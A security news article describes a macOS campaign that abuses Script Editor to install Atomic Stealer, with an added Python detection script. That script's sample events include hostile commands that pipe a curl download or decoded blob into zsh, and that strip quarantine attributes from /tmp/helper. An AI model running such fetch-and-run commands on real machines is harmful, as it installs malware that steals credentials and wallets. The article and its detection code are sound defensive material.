A new macOS malware campaign abuses Script Editor to deliver Atomic Stealer without requiring Terminal interaction, bypassing recent security protections.
A new macOS malware campaign is exploiting the Script Editor application to deliver the Atomic Stealer (AMOS) malware through a variation of the ClickFix social engineering attack. This technique allows attackers to bypass recent macOS security protections that were specifically designed to block ClickFix attacks in Terminal.
How the attack works
The campaign, discovered by security researchers at Jamf, targets macOS users through fake Apple-themed websites that pose as legitimate guides for reclaiming disk space on Mac computers. These malicious pages contain convincing system cleanup instructions but hide a dangerous payload.
When victims visit these sites, the attackers use the applescript:// URL scheme to automatically launch the Script Editor application with pre-filled executable code. This approach is particularly insidious because Script Editor is a trusted, built-in macOS application for writing and running scripts, primarily AppleScript and JXA.
Unlike traditional ClickFix attacks that require victims to manually copy and paste commands into Terminal, this variant eliminates that step entirely. The malicious code embedded in Script Editor runs an obfuscated curl | zsh command that downloads and executes a script directly in system memory.
The malware delivery chain
The attack follows a sophisticated multi-stage delivery process:
- The obfuscated command decodes a base64 + gzip payload
- It downloads a binary to /tmp/helper
- Security attributes are removed using xattr -c
- The binary is made executable
- The final payload runs as a Mach-O binary
The final payload is identified as Atomic Stealer (AMOS), a commodity malware-as-a-service that has been extensively deployed in ClickFix campaigns using various lures over the past year.
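The delivery chain above leaves a recognisable sequence of process events. The following is an added detection example (not Jamf's or the article's code) that correlates those stages per host; the event fields `host`, `parent` and `cmdline` are an assumed EDR-style export, and the sample events are constructed.

```python
"""Flag the Script Editor -> curl | zsh -> /tmp/helper chain in process-execution events.
Added example, not Jamf's or the article's code; event fields are an assumed EDR export."""
import re

# One regex per stage of the chain described above; the first also checks the parent process.
STAGES = {
    "scripteditor_shell": (r"(?i)script editor", r"(^|[/\s])(zsh|bash|sh)\b"),
    "curl_pipe_shell":    (None, r"\bcurl\b[^|]*\|\s*(zsh|bash|sh)\b"),
    "decode_payload":     (None, r"base64\s+(-d|-D|--decode)|gunzip|gzip\s+-d"),
    "xattr_strip":        (None, r"\bxattr\s+-c\b"),
    "chmod_tmp_binary":   (None, r"\bchmod\s+\+x\s+/tmp/"),
}

SAMPLE_EVENTS = [  # constructed; the real base64 blob is replaced by a placeholder
    {"host": "mac-01", "parent": "Script Editor",
     "cmdline": "/bin/zsh -c 'echo <B64_PLACEHOLDER> | base64 -d | gunzip | zsh'"},
    {"host": "mac-01", "parent": "zsh", "cmdline": "/bin/zsh -c 'curl -fsSL https://example.invalid/s | zsh'"},
    {"host": "mac-01", "parent": "zsh", "cmdline": "xattr -c /tmp/helper"},
    {"host": "mac-01", "parent": "zsh", "cmdline": "chmod +x /tmp/helper"},
    # benign activity on another host that must not fire
    {"host": "mac-02", "parent": "Terminal", "cmdline": "xattr -c /Users/me/Downloads/notes.txt"},
    {"host": "mac-02", "parent": "Script Editor", "cmdline": "osascript -e 'display dialog \"hi\"'"},
]

def classify_event(event):
    """Return the set of chain stages a single event matches."""
    hits = set()
    for name, (parent_re, cmd_re) in STAGES.items():
        if parent_re and not re.search(parent_re, event.get("parent", "")):
            continue
        if re.search(cmd_re, event.get("cmdline", "")):
            hits.add(name)
    return hits

def stages_per_host(events):
    """Correlate per host: the stages arrive as separate process events."""
    seen = {}
    for ev in events:
        seen.setdefault(ev["host"], set()).update(classify_event(ev))
    return seen

def is_suspicious(stages):
    """Need the launch/download stage plus two more, so a lone xattr -c in a dev shell stays quiet."""
    return bool({"scripteditor_shell", "curl_pipe_shell"} & stages) and len(stages) >= 3

def find_suspicious_hosts(events):
    return sorted(h for h, s in stages_per_host(events).items() if is_suspicious(s))

if __name__ == "__main__":
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(host, sorted(stages), "SUSPICIOUS" if is_suspicious(stages) else "ok")
```

The per-host threshold is the tunable part: lowering it to two stages catches earlier, but a single xattr -c or chmod in a developer's shell should never fire on its own.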
What Atomic Stealer targets
Once installed, AMOS is designed to harvest a broad spectrum of sensitive data from compromised systems:
- Keychain passwords and certificates
- Desktop files and documents
- Browser cryptocurrency wallet extensions
- Browser autofill data, passwords, and cookies
- Stored credit card information
- System information and hardware details
Last year, AMOS added a backdoor component that gives attackers persistent access to compromised systems, making it even more dangerous than typical information stealers.
Bypassing macOS security measures
This campaign demonstrates how attackers continue to evolve their techniques to bypass security protections. In macOS Tahoe 26.4, Apple added warnings when users attempt to execute commands in Terminal as part of ClickFix attack prevention.
By shifting the attack vector from Terminal to Script Editor, the attackers circumvent these protections while maintaining the same social engineering premise. The use of a trusted system application makes the attack more convincing and reduces the likelihood of user suspicion.
Protection recommendations
Mac users should treat Script Editor prompts as high-risk and avoid running them on their devices unless they fully understand what they do and trust the source. The legitimate use cases for Script Editor are relatively limited for average users, making unexpected prompts a significant red flag.
For macOS troubleshooting and system maintenance, it is recommended to rely only on official documentation from Apple. While Apple Support Communities can be a helpful resource where Apple customers advise each other, it is not entirely risk-free, and any suggested commands or scripts should be carefully verified before they are run.
This campaign highlights the ongoing evolution of macOS malware delivery techniques and the importance of user vigilance when encountering unexpected application prompts, even from seemingly legitimate sources.